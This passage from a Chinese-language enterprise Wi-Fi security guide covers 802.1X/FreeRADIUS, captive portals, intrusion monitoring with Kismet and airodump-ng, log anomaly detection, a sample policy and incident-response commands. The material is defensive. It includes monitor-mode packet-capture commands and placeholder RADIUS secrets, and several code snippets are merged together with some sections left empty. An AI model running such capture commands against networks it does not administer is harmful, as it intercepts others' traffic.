- 认证服务器（Authentication Server）：RADIUS服务器

- **认证方法选择**：
- EAP-TLS：使用证书，安全性最高
- PEAP-MSCHAPv2：用户名/密码+加密隧道
- EAP-TTLS：可支持多种内部认证方法

- **FreeRADIUS配置示例**：

  authorize {
      eap { ok = return }
      files
      expiration
      logintime
  }
  
  authenticate {
      eap
  }

- **客户端配置**：
- 配置EAP类型和凭证
- 确保客户端支持所选择的认证方法
- 示例Windows配置（PowerShell）：
  ```powershell
  # 配置无线配置文件使用802.1X
  netsh wlan add profile filename="SecureWireless.xml" interface="Wi-Fi"
  ```

#### 6.3.3 基于角色的访问控制

基于角色的访问控制（RBAC）可以根据用户角色提供差异化的网络访问权限：

- **角色定义**：
- 管理员角色：完全访问权限
- 员工角色：访问工作相关资源
- 访客角色：仅访问互联网
- IoT角色：仅访问特定服务器

- **FreeRADIUS角色配置**：

- **访问控制策略示例**：

#### 6.3.4 访客管理系统

为访客提供安全的网络访问需要专门的管理系统：

- **访客自助注册**：
- 部署访客自助注册门户
- 收集基本访客信息
- 生成临时访问凭证

- **访客网络特点**：
- 有限的访问时间（如24小时）
- 带宽限制
- 隔离的网络环境
- 强制门户（Captive Portal）认证

- **强制门户配置示例**：
```bash
# 使用hostapd和CoovaChilli配置强制门户
interface=wlan0
driver=nl80211
ssid=Guest-Network

# 配置CoovaChilli接口
up_interface=eth0
dhcpd=internal
uamserver=http://192.168.1.254:3990
uamsecret=chillipass
radiusnasid=nas01
radiusauthport=1812
radiusacctport=1813
radiussecret=radiuspassword

# Kismet安装和配置
sudo apt install kismet
sudo systemctl enable kismet
sudo systemctl start kismet
# 访问Kismet Web界面：http://localhost:2501

# 设置监控脚本
#!/bin/bash
sudo airmon-ng start wlan0
sudo airodump-ng --output-format csv -w wids_monitor wlan0mon

# 简单的异常检测脚本示例
import pandas as pd
import numpy as np
from datetime import datetime

# 读取认证日志
auth_logs = pd.read_csv('auth_attempts.csv')

# 计算每分钟认证失败次数
auth_logs['timestamp'] = pd.to_datetime(auth_logs['timestamp'])
failed_auths = auth_logs[auth_logs['status'] == 'failed']
failed_per_minute = failed_auths.resample('1T', on='timestamp').size()

# 检测异常（使用简单统计方法）
threshold = failed_per_minute.mean() + 3 * failed_per_minute.std()
anomalies = failed_per_minute[failed_per_minute > threshold]

# 生成警报
if len(anomalies) > 0:
    print(f"检测到可能的暴力破解攻击！")
    for timestamp, count in anomalies.items():
        print(f"时间: {timestamp}, 失败次数: {count}")
        # 这里可以添加自动响应逻辑，如封锁IP、发送通知等

# 使用rsyslog配置集中日志服务器
# 服务器配置 (/etc/rsyslog.conf)
module(load="imudp")
input(type="imudp" port="514")

# 客户端配置
echo "*.* @192.168.1.100:514" >> /etc/rsyslog.conf
sudo systemctl restart rsyslog

# 安装和运行OpenVAS
sudo apt install openvas
sudo gvm-setup
sudo gvm-start
# 访问Web界面：https://localhost:9392

# 简单的固件版本检查脚本示例
#!/bin/bash

# 设备列表和当前版本
devices=("AP1:192.168.1.10:v2.3.4" "AP2:192.168.1.11:v2.3.4" "AP3:192.168.1.12:v2.2.1")
latest_version="v2.4.0"

echo "固件版本检查结果: $(date)"
echo "------------------------"

for device in "${devices[@]}"; do
    name=$(echo $device | cut -d':' -f1)
    ip=$(echo $device | cut -d':' -f2)
    version=$(echo $device | cut -d':' -f3)
    
    echo "设备: $name ($ip)"
    echo "当前版本: $version"
    
    if [ "$version" != "$latest_version" ]; then
        echo "状态: 需要更新到 $latest_version"
        # 这里可以添加自动更新逻辑或通知
    else
        echo "状态: 已更新"
    fi
    echo "------------------------"
done

#!/bin/bash
# 简单的配置备份脚本

DATE=$(date +%Y%m%d)
BACKUP_DIR="/backup/wireless_configs/$DATE"
mkdir -p "$BACKUP_DIR"

# 备份AP配置（示例使用SSH）
aps=("192.168.1.10" "192.168.1.11" "192.168.1.12")

for ap in "${aps[@]}"; do
    echo "备份 $ap 配置..."
    ssh admin@$ap "show running-config" > "$BACKUP_DIR/ap_${ap//./_}.conf"
done

# 创建压缩存档
tar -czf "/backup/wireless_configs_$DATE.tar.gz" "$BACKUP_DIR"
echo "备份完成: /backup/wireless_configs_$DATE.tar.gz"

# 无线网络安全策略

## 1. 目的
本文档规定了组织无线网络的安全要求和管理流程，旨在保护公司数据和系统安全。

## 2. 适用范围
本策略适用于所有公司拥有、管理或使用的无线网络设备和服务。

## 3. 策略要求

### 3.1 网络安全标准
- 必须使用WPA2或WPA3加密
- 禁止使用WEP加密
- 所有接入点必须禁用WPS

### 3.2 访问控制
- 员工必须使用802.1X认证
- 访客必须通过访客管理系统注册
- 未授权设备禁止接入网络

### 3.3 设备管理
- 所有无线设备必须注册
- 定期更新固件
- 实施强密码策略

## 4. 责任分配
- IT部门：负责无线网络基础设施管理
- 安全团队：负责策略制定和合规监控
- 员工：负责遵守安全策略和报告异常

## 5. 合规性与审计
- 定期进行安全审计
- 违规行为将受到纪律处分

## 6. 策略更新
本策略每年审查和更新一次，或在技术或业务需求变化时及时更新。

# 使用PowerShell配置Intune策略
Connect-MSGraph

# 创建Wi-Fi配置文件
$wifiConfig = @{
    "@odata.type" = "#microsoft.graph.wiFiConfiguration";
    displayName = "Corporate-WiFi";
    ssid = "Company-Secure";
    wiFiSecurityType = "wpaEnterprise";
    eapType = 13; # EAP-TLS
    trustedServerCertificateNames = @("company-ca.example.com");
    authenticationMethod = "certificate";
    identityCertificateForClientAuthentication = @{
        referenceId = "company-client-cert"
    };
    rootCertificateForServerValidation = @{
        referenceId = "company-root-cert"
    };
}

New-MgDeviceManagementDeviceConfiguration -BodyParameter $wifiConfig

# 使用Wireshark分析可疑流量
sudo wireshark -r suspicious_traffic.pcap

# 使用tshark提取特定信息
sudo tshark -r suspicious_traffic.pcap -Y "wlan.sa == 00:11:22:33:44:55" -T fields -e wlan.sa -e wlan.da -e radiotap.dbm_antsignal > signal_strength.csv

# 使用tcpdump实时监控
sudo tcpdump -i wlan0mon -n "host 192.168.1.100" -w实时_monitor.pcap

# 阻止恶意MAC地址
sudo iptables -A INPUT -m mac --mac-source 00:11:22:33:44:55 -j DROP

# 在交换机上关闭端口
ssh admin@switch "interface GigabitEthernet1/0/10 shutdown"

# 禁用可疑的无线接入点
ssh admin@wireless_controller "ap-name problem-ap shutdown"

# 从备份恢复AP配置
scp backup/ap-config.conf admin@192.168.1.10:/tmp/
ssh admin@192.168.1.10 "configure replace /tmp/ap-config.conf force"

# 重启服务
sudo systemctl restart hostapd
sudo systemctl restart freeradius